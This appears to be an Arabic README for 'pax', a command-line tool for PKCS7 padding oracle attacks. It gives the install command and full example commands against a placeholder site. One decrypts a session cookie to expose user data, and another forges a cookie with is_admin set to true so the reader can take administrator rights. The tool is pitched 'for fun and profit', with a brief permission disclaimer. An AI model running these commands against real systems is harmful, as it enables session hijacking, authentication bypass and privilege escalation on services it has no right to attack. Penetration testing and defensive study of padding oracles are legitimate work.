
💀 🔓 أداة CLI لهجمات PKCS7 padding oracle
استغل وسادات الحشو (padding oracles) للمتعة والربح!
باكس هي أداة لاستغلال وسادات الحشو بهدف:
يمكن استخدام هذا لكشف معلومات الجلسات المشفرة، وغالبًا لتجاوز المصادقة، ورفع الصلاحيات، وتنفيذ الأكواد عن بُعد عن طريق تشفير نص صريح مخصص وكتابته مرة أخرى على الخادم.
كالعادة، يجب استخدام هذه الأداة فقط على الأنظمة التي تملكها و/أو لديك إذن باختبارها!
قم بالتحميل من الإصدارات، أو قم بالتثبيت باستخدام Go:
go get -u github.com/liamg/pax/cmd/pax
إذا وجدت وسيطًا مشبوهًا، حيث تكون البيانات المشفرة مخزنة داخل كوكي باسم SESS، يمكنك استخدام ما يلي:
pax decrypt --url https://target.site/profile.php --sample Gw3kg8e3ej4ai9wffn%2Fd0uRqKzyaPfM2UFq%2F8dWmoW4wnyKZhx07Bg%3D%3D --block-size 16 --cookies "SESS=Gw3kg8e3ej4ai9wffn%2Fd0uRqKzyaPfM2UFq%2F8dWmoW4wnyKZhx07Bg%3D%3D"
سيؤدي هذا - نأمل - إلى إعطائك بعض النصوص الصريحة، ربما شيء مثل:
{"user_id": 456, "is_admin": false}
يبدو أن بإمكانك رفع صلاحياتك هنا!
يمكنك محاولة فعل ذلك عن طريق أولاً إنشاء بياناتك المشفرة الخاصة التي سيقوم الوسيط بفك تشفيرها لتعود إلى نص صريح ماكر:
pax encrypt --url https://target.site/profile.php --sample Gw3kg8e3ej4ai9wffn%2Fd0uRqKzyaPfM2UFq%2F8dWmoW4wnyKZhx07Bg%3D%3D --block-size 16 --cookies "SESS=Gw3kg8e3ej4ai9wffn%2Fd0uRqKzyaPfM2UFq%2F8dWmoW4wnyKZhx07Bg%3D%3D" --plain-text '{"user_id": 456, "is_admin": true}'
سيخرج هذا مجموعة أخرى من البيانات المشفرة بترميز base64، ربما شيء مثل:
dGhpcyBpcyBqdXN0IGFuIGV4YW1wbGU=
الآن يمكنك فتح متصفحك وتعيين قيمة الكوكي SESS إلى القيمة أعلاه. عند تحميل صفحة الوسيط الأصلية، يجب أن ترى الآن أن صلاحياتك رُفعت إلى مستوى المسؤول.
فيما يلي أدلة رائعة حول كيفية عمل هذا الهجوم: